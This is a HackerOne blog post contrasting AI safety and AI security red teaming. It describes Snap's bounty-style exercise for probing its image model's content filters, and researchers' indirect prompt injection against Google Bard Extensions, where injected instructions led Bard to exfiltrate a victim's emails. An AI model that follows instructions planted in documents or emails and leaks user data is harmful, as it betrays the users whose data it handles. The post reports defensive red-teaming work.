AI Safety vs. AI Security [2 Types of AI Red Teaming]

Dane Sherrets

Senior Solutions Architect

March 14th, 2024

While the terminology is similar, there are distinct differences between AI safety and AI security — and, as the speed of GenAI deployments ramp up daily, it’s important to understand the differences and how to test for each.

What Is the Difference Between Red Teaming For AI Safety and AI Security?

AI red teaming is a form of AI testing to find flaws and vulnerabilities, and the method can be used for both AI safety and AI security exercises. However, the execution and goals differ from one to the other.

AI red teaming for safety issues focuses on preventing AI systems from generating harmful content, such as providing instructions on creating bombs or producing offensive language. It aims to ensure responsible use of AI and adherence to ethical standards.

On the other hand, red teaming exercises for AI Security involve testing AI systems with the goal of preventing bad actors from abusing the AI to, for example, compromise the confidentiality, integrity, or availability of the systems the AI are embedded in.

AI Safety Example: Snap, Inc.

Snap Inc. has been an early adopter of AI safety red teaming and has partnered with HackerOne to test the strict safeguards they have in place around this new technology. Together, we have made significant developments in the methodology for AI safety red teaming that has led to a more effective approach to surfacing previously unknown problems.

Snap uses image-generating AI models within the backend of its program. The Safety team had already identified eight categories of harmful imagery they wanted to test for, including violence, sex, self-harm, and eating disorders.

"We knew we wanted to do adversarial testing on the product, and a security expert on our team suggested a bug bounty-style program. From there, we devised the idea to use a 'Capture the Flag' (CTF) style exercise that would incentivize researchers to look for our specific areas of concern. Capture the Flag exercises are a common cybersecurity exercise, and a CTF was used to test large language models (LLMs) at DEFCON. We hadn't seen this applied to testing text-to-image models but thought it could be effective."
— Ilana Arbisser, Technical Lead, AI Safety at Snap Inc.

By setting bounties, we incentivized our community to test the product, and to focus on the content Snap was most concerned about being generated on their platform. Snap and HackerOne adjusted bounties dynamically and continued to experiment with prices to optimize for researcher engagement. The exercise was able to give Snap a process by which to test their filters and generate data that can be used to further evaluate the model. We anticipate the research and the subsequent findings to help create benchmarks and standards for other social media companies to use the same flags to test for content.

AI Security Example: Google Bard

In a red teaming exercise for AI security, hackers Joseph "rez0" Thacker, Justin "Rhynorater" Gardner, and Roni "Lupin" Carta collaborated together to hack its GenAI assistant, Bard.

The launch of Bard’s Extensions AI feature provides Bard with access to Google Drive, Google Docs, and Gmail. This means Bard would have access to Personally Identifiable Information (PII) and could even read emails, drive documents, and locations. The hackers identified that it analyzes untrusted data and could be susceptible to Indirect Prompt Injection, which can be delivered to users without their consent.

In less than 24 hours from the launch of Bard Extensions, the hackers were able to demonstrate that:

Google Bard is vulnerable to Indirect Prompt Injection via data from Extensions.
Malicious image Prompt Injection instructions will exploit the vulnerability.
When writing the exploit, a prompt injection payload was developed that would exfiltrate the victim’s emails.

indirect prompt injection in Google Bard

With such a powerful impact as the exfiltration of personal emails, the hackers promptly reported this vulnerability to Google, which resulted in a $20,000 bounty.

Bugs like this only scratch the surface of the security vulnerabilities found in GenAI. Organizations developing and deploying GenAI and LLMs need security talent that specializes in the OWASP Top 10 for LLMs if they are going to be serious about introducing it competitively and securely.

AI Red Teaming for Safety and Security With HackerOne

By using the expertise of ethical hackers and adapting the bug bounty model to address AI safety and security, HackerOne's playbook for AI Red Teaming is a proactive approach to fortifying AI while mitigating potential risks. For technology and security leaders venturing into AI integration, we look forward to partnering with you to explore how HackerOne and ethical hackers can contribute to your AI safety journey. To learn more about how to implement AI Red Teaming for your organization, contact our experts at HackerOne.

The 8th Annual Hacker-Powered Security Report

Read the Report

AI Safety vs. AI Security

Share

What Is the Difference Between Red Teaming For AI Safety and AI Security?

AI Safety Example: Snap, Inc.

AI Security Example: Google Bard

AI Red Teaming for Safety and Security With HackerOne

Related Content

An Emerging Playbook for AI Red Teaming With HackerOne

Snap's Safety Efforts With AI Red Teaming From HackerOne

Unlocking Trust in AI: The Ethical Hacker's Approach to AI Red Teaming